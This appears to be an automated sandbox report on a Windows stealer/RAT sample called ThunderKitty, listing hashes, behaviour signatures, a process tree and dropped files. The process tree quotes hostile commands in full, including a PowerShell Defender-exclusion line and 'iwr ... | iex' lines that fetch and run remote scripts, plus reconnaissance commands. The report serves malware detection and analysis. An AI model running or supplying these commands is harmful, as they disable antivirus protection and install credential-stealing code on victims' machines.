Analysis

  • max time kernel
    133s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/08/2024, 21:25

General

  • Target

    2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    d7524beacdb7439b2d95557c2d401575

  • SHA1

    405accbe3741e045f135bd2a917cefe71a56f3ee

  • SHA256

    8dcd33b7c93edb2315232ba4203bbc1490a1c3f4d672fda5fdf73d2da113f749

  • SHA512

    a265180af4e5422bd68397146e89ab3fff1cd0e2c877a668f4c8677a50efaf1852556d74ed99eab7891bcd932cc201f9e20076053f1a68e9c66c44260fdac9cb

  • SSDEEP

    196608:+sWQx346ioeXYk8TmIhI0bQ+ko9gvK9aXFFT:+2xcoKZ8TmsI00+kzvfz

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5020
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ibddl0bw\ibddl0bw.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4716
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC3BD.tmp" "c:\Users\Admin\AppData\Local\Temp\ibddl0bw\CSC7F4B9DDB4DDB42EE83C5CF7EB84D7A6B.TMP"
          4⤵
            PID:3780
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:1520
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4432
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:4468
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:4596
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:3924
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2184
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:4856
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:488
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:5044
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:1812
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:4764
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:4808
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:3852
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:2608
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:2340
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:4532
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:3552
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2120
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c2ycntp5\c2ycntp5.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4456
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC3CD.tmp" "c:\Users\Admin\AppData\Local\Temp\c2ycntp5\CSC48757552B064EF0AEE84634B4C54E1.TMP"
                          4⤵
                            PID:4632
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c start facebook.com
                        2⤵
                          PID:1988
                        • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                          PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5008
                        • C:\Windows\system32\cmd.exe
                          cmd /c rundll32.exe user32.dll,SwapMouseButton
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2696
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe user32.dll,SwapMouseButton
                            3⤵
                              PID:2060
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                            2⤵
                            • Views/modifies file attributes
                            PID:4436
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM wallpaper32.exe
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3624
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x50c 0x4f4
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3300

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          98608aeba29dda9a58da36009df5abf8

                          SHA1

                          fc81bc843fd1615ab287f12619b13e67fe08e858

                          SHA256

                          8fce0d482a779242c11c5e0d4e4e63076006ff9bc5640faf5f2819db416a8fcc

                          SHA512

                          94a0d4adc11bdbc3eae4da747fea9ebe5c66b8c5fd5ef7fbc7a56a0de117dc1ab211150f715b100dd865c2adcf2290ad84ddbc4f07ca07cde37d5c6fc78a2d83

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          c18e55fadceb55c96c68877ca0b33128

                          SHA1

                          f58a6d92da219d09cb9fba8ddcaff2ad5e94dffa

                          SHA256

                          76286c774e5a232d707d4140991c150cd1053bbcb355e08ff88b9ea50fd1bc66

                          SHA512

                          4f52b8558d9daefc695ac6d9a0a6c605754e6363f9bf2d85b16732f367aac5e2e20d467d5b02559261954a01f4fdfbfa3c2a67955dbaa2e8c454cb1dc9947436

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          e2ffae1f09795d880e4d1050fb5e1194

                          SHA1

                          391a821a754b15654be7cf18347bac67f1bbc682

                          SHA256

                          b1e3a0e39734520d8c3b6afa8feeb4bf70890a653939f0727502e66c029f41cb

                          SHA512

                          7de2152fced393682299e5f4225b6d90e1e15aaaf4e80e749ea6f5567813532f77972652cfa855ced4ff084784d916caf71f4bdffb96662e884acd46302e5bec

                        • C:\Users\Admin\AppData\Local\Temp\RESC3BD.tmp

                          Filesize

                          1KB

                          MD5

                          67fb29b8c98138f817646d5a9349ecec

                          SHA1

                          a19053731a7bf52bcac30650f75d4c566de11e00

                          SHA256

                          c11ff5f4e41bcc0fcd2c985b5728d363dd238f26129f10a161c5e72303ea7d79

                          SHA512

                          d8050591ca08b639e3bccfbc95bf431f4f77486eb6d57dc4daa4ab57cd9953b7bf57219146ccadcb243dec87bc4d4a96a087c67230dc1de0066c00068bdd3d91

                        • C:\Users\Admin\AppData\Local\Temp\RESC3CD.tmp

                          Filesize

                          1KB

                          MD5

                          3342be72bdd5ea3494a58f9dc80e558b

                          SHA1

                          39ca337908784d0bd2ee95e123b5fb27aff4707c

                          SHA256

                          6b565aeb54fcff3e07f66a9295a0b8827e442d2953b33943974e54dc815005bc

                          SHA512

                          033f1e822cee122dfcc2533ad11f992c2da21840974f1c61292198cbf868614f86c3bd328d4602bec328d683566b83e77ad174bcd635e612d3f518d14459f7e7

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                          Filesize

                          88KB

                          MD5

                          604952063febf0ecca6702ea682cbec4

                          SHA1

                          da896ffea0a71eb11f5ffc6e9ee021c39951f343

                          SHA256

                          f53cc6690ad00c9384501d2be9be2e2ede4163492c9f22677fd4fc7e5378f3eb

                          SHA512

                          235b28916cd0f26d2bc7ec5c00dcac3a0a17feb269675a3088c860d2b86f9f8681c59f5614d127c78c789054e6506e65759c3505d508fb690572da2d9763e4ef

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                          Filesize

                          25KB

                          MD5

                          04232f4d514ef1ca58e7b7dcad1e4dc2

                          SHA1

                          958218f054cd4c157d8dd4c4dbfb648d45201ac9

                          SHA256

                          7b5abb4e300cabf3591921c6818903e242c501fdd2d9e22ca9337e1e63c3e46a

                          SHA512

                          6290e7ce3cd4fc560f74c40c31b29da67d83aa0cc53ac21f1da6ea9c012f5b4a3ad8995cc3e1c22f8df12b0824d2f5663110f4df03babc94f960f61043596726

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vkn3w3yr.hhz.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\c2ycntp5\c2ycntp5.dll

                          Filesize

                          4KB

                          MD5

                          603093788f46cc4ae68b42fb6e5b1e4c

                          SHA1

                          ce262708c0191e87cb0f084defaa5c5d9b3bba5a

                          SHA256

                          be6ecf7bdc98ae20736d36036f3f36ef48e5ffbeb442fb52c81a4c7d08ba0dbc

                          SHA512

                          553085a1b9b3b4d7430db1474702cfdb3b6efd9e4ad3fbc58152b4a968bb865b7fd899f69d6d09145414673042a639a8c77792cb43697bd6c4d2cbde72bc0495

                        • C:\Users\Admin\AppData\Local\Temp\ibddl0bw\ibddl0bw.dll

                          Filesize

                          4KB

                          MD5

                          e860c2965ec8aaf6238a12a113017f85

                          SHA1

                          42282a2e91de254aa8637fba6b4b408ec14d3a84

                          SHA256

                          96d3d83ccc46ae68c3a91a5973edd1cc36f07e69755ad09dbaaae3f81e3581a1

                          SHA512

                          7974b0aa3cc6965da988c2ef527570e154bca70103a6f43d514f115a2d741eae2a13a73f5b28592ddf90604f73b698d85f299e191eca645f36d242184d647107

                        • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                          Filesize

                          2KB

                          MD5

                          9758656bbe8589c66bb241b052490c72

                          SHA1

                          b73da83fb3ae6b86c6365769a04de9845d5c602c

                          SHA256

                          e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                          SHA512

                          da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                        • \??\c:\Users\Admin\AppData\Local\Temp\c2ycntp5\CSC48757552B064EF0AEE84634B4C54E1.TMP

                          Filesize

                          652B

                          MD5

                          32de9e8b3593dfc48ddde4457edd8301

                          SHA1

                          ae93e83fb38df6e74b6a02c4f94ddb20db5fb73f

                          SHA256

                          c8b63d074f31b8cfd7f2de22d3dd2efdbf993b76b0963e922148401f31d128b9

                          SHA512

                          4ab26e57a11229e112739e09a8cab5dd078ca9ae112f459d316964686819516556436fd68d94ab3701726e45763da614af2e2b148abcbbe4d46d4c5a36c2a2d4

                        • \??\c:\Users\Admin\AppData\Local\Temp\c2ycntp5\c2ycntp5.cmdline

                          Filesize

                          369B

                          MD5

                          663400a2a7f1cafa4dfca092db447c69

                          SHA1

                          660732d06c05b65d140e372f686d52627a95acc9

                          SHA256

                          9f9ceecf9f3723a7af52efc0a8b887661b52df61700d27afa0cd6b53c5089e62

                          SHA512

                          c6cf9f06c122e49ac7b9f62f1b60358562a11c8abfa88979139268f507e233c93869a7a5ade2bce54fef3e5f709822898badc0cc0e8fac2478d19c4d181e15f4

                        • \??\c:\Users\Admin\AppData\Local\Temp\ibddl0bw\CSC7F4B9DDB4DDB42EE83C5CF7EB84D7A6B.TMP

                          Filesize

                          652B

                          MD5

                          5482cefbab214ed3f53c2f8114475f98

                          SHA1

                          16423c119fd3900e68fd677af4e078bb392d205e

                          SHA256

                          52e3c3e1234349c6095c3d336cb8f5ecc976a89f6aa3fd32c94be6c1fc435408

                          SHA512

                          20e4d2d8edbcab7a275d981467d976d750778012afe3a321e8e4092f0c4f025313c577cd538be0bba76c34fb98f3c056766a089a5dbd0ae479626531b410e6d9

                        • \??\c:\Users\Admin\AppData\Local\Temp\ibddl0bw\ibddl0bw.0.cs

                          Filesize

                          1KB

                          MD5

                          8a1e7edb2117ec5dde9a07016905923b

                          SHA1

                          0155dbeeb16333e2eaa767b0209750efee56f47f

                          SHA256

                          c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                          SHA512

                          4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                        • \??\c:\Users\Admin\AppData\Local\Temp\ibddl0bw\ibddl0bw.cmdline

                          Filesize

                          369B

                          MD5

                          bc966e0a1d36272371d535d912f8f488

                          SHA1

                          4a382577467ad8c6fefc1b58674b2777f5c1a5a6

                          SHA256

                          4b3fff765af08b11a6a85394db466b57f64f24b9797aee247577463412576fbc

                          SHA512

                          79fa830cba702dc7a530a5c662404ce141c097dd1564d6cb30bcd75e26efe789e8dcf53fbe69a9cbff0eb149d3181daad0516dcc3599240a027e7c2f70cee0bd

                        • memory/2120-77-0x0000025DD0960000-0x0000025DD0968000-memory.dmp

                          Filesize

                          32KB

                        • memory/2120-90-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2120-89-0x0000025DEAB00000-0x0000025DEAD1C000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/2120-33-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2120-28-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2120-22-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4740-50-0x000002787BC40000-0x000002787BE5C000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/4740-41-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4740-1-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4740-16-0x0000027879B60000-0x0000027879B82000-memory.dmp

                          Filesize

                          136KB

                        • memory/4740-53-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4740-0-0x00007FF9EF573000-0x00007FF9EF575000-memory.dmp

                          Filesize

                          8KB

                        • memory/5008-127-0x000002A9370A0000-0x000002A9372BC000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/5020-93-0x00000215B9060000-0x00000215B908A000-memory.dmp

                          Filesize

                          168KB

                        • memory/5020-79-0x00000215B9710000-0x00000215B9EB6000-memory.dmp

                          Filesize

                          7.6MB

                        • memory/5020-129-0x00000215B90A0000-0x00000215B90B2000-memory.dmp

                          Filesize

                          72KB

                        • memory/5020-130-0x00000215B8E00000-0x00000215B8E0A000-memory.dmp

                          Filesize

                          40KB

                        • memory/5020-94-0x00000215B9060000-0x00000215B9084000-memory.dmp

                          Filesize

                          144KB

                        • memory/5020-139-0x00000215B8830000-0x00000215B8A4C000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/5020-70-0x000002159E5A0000-0x000002159E5A8000-memory.dmp

                          Filesize

                          32KB